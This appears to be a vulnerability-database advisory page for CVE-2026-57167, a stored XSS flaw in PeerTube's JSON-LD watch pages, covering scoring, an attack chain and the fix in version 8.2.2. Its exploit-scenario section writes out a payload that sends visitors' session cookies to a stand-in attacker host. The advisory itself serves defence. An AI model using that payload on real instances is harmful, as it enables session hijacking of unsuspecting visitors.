Skip to main content

PeerTube CVE-2026-57167

| EUVDEUVD-2026-42952 MEDIUM
Basic XSS (CWE-80)
2026-07-10 GitHub_M
5.1
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.4 MEDIUM

Stored XSS requires low-privilege upload account (PR:L) and victim page visit (UI:R); scope changes to browser context with limited confidentiality and integrity impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

2
Patch available
Jul 10, 2026 - 18:01 EUVD
Analysis Generated
Jul 10, 2026 - 17:36 vuln.today

DescriptionCVE.org

PeerTube is an ActivityPub-federated video streaming platform. Prior to 8.2.2, server-side-rendered video watch pages embed a schema.org JSON-LD block by JSON.stringify-ing video metadata without escaping less-than, greater-than, or slash characters, allowing a value containing the byte sequence that closes a script element to inject arbitrary HTML or JavaScript that executes in the instance origin for visitors to the attacker's videos. This issue is fixed in version 8.2.2.

AnalysisAI

Stored XSS in PeerTube before version 8.2.2 allows any authenticated uploader to inject arbitrary HTML and JavaScript into the instance origin by embedding the byte sequence </script> inside video metadata fields. The server-side renderer serializes video metadata directly into schema.org JSON-LD script blocks using JSON.stringify without HTML-character escaping, causing the browser to terminate the script tag prematurely and parse attacker-controlled content as raw HTML. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Register or obtain upload account on target instance
Delivery
Set video metadata field to contain </script> payload
Exploit
Victim visits video watch page
Execution
Browser HTML parser terminates JSON-LD script block prematurely
Persist
Attacker JavaScript executes in instance origin
Impact
Session token or credentials exfiltrated to attacker-controlled endpoint

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to hold an account with video upload privileges on the target PeerTube instance - on open-registration instances this is trivially obtainable; on closed instances it requires prior account compromise or social engineering. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:L/UI:P, score 5.1) accurately captures the key risk constraints: network reachability with low complexity, but requiring low-privilege account access (PR:L) and passive victim interaction (UI:P). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker registers an account on a PeerTube instance with open registration enabled and uploads a video with a title such as Interesting Video</script><script>document.location='https://attacker.example/steal?c='+document.cookie</script>. The PeerTube server embeds this title unescaped into the JSON-LD block of the video watch page; when any visitor navigates to that page, the browser closes the script tag at </script>, executes the attacker's payload in the instance's origin, and exfiltrates the victim's session cookie. …
Remediation Upgrade to PeerTube 8.2.2 or later immediately; the patched release is available at https://github.com/Chocobozzz/PeerTube/releases/tag/v8.2.2 and addresses the root cause by adding proper HTML-character escaping to the JSON-LD metadata serialization path (commit 45394d701b08e87d72b8f0c1866b881f2becbde3). … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2025-32948 HIGH POC
7.5 Apr 15

The vulnerability allows any attacker to cause the PeerTube server to stop functioning, or in special cases send request

CVE-2025-32947 HIGH POC
7.5 Apr 15

This vulnerability allows any attacker to cause the PeerTube server to stop responding to requests due to an infinite lo

CVE-2025-32949 MEDIUM POC
6.5 Apr 15

This vulnerability allows any authenticated user to cause the server to consume very large amounts of disk space when ex

CVE-2025-32944 MEDIUM POC
6.5 Apr 15

The vulnerability allows any authenticated user to cause the PeerTube server to stop functioning in a persistent manner.

CVE-2022-0881 MEDIUM POC
6.5 Mar 09

Insecure Storage of Sensitive Information in GitHub repository chocobozzz/peertube prior to 4.1.1. Rated medium severity

CVE-2021-3780 MEDIUM POC
6.1 Sep 15

peertube is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). Rated me

CVE-2022-0727 MEDIUM POC
5.4 Feb 23

Improper Access Control in GitHub repository chocobozzz/peertube prior to 4.1.0. Rated medium severity (CVSS 5.4), this

CVE-2022-0726 MEDIUM POC
5.4 Feb 23

Missing Authorization in GitHub repository chocobozzz/peertube prior to 4.1.0. Rated medium severity (CVSS 5.4), this vu

CVE-2025-32946 MEDIUM POC
5.3 Apr 15

This vulnerability allows any attacker to add playlists to a different user’s channel using the ActivityPub protocol. Ra

CVE-2025-32945 MEDIUM POC
4.3 Apr 15

The vulnerability allows an existing user to add playlists to a different user’s channel using the PeerTube REST API. Ra

CVE-2025-32943 LOW POC
3.7 Apr 15

The vulnerability allows any authenticated user to leak the contents of arbitrary “.m3u8” files from the PeerTube server

Share

CVE-2026-57167 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy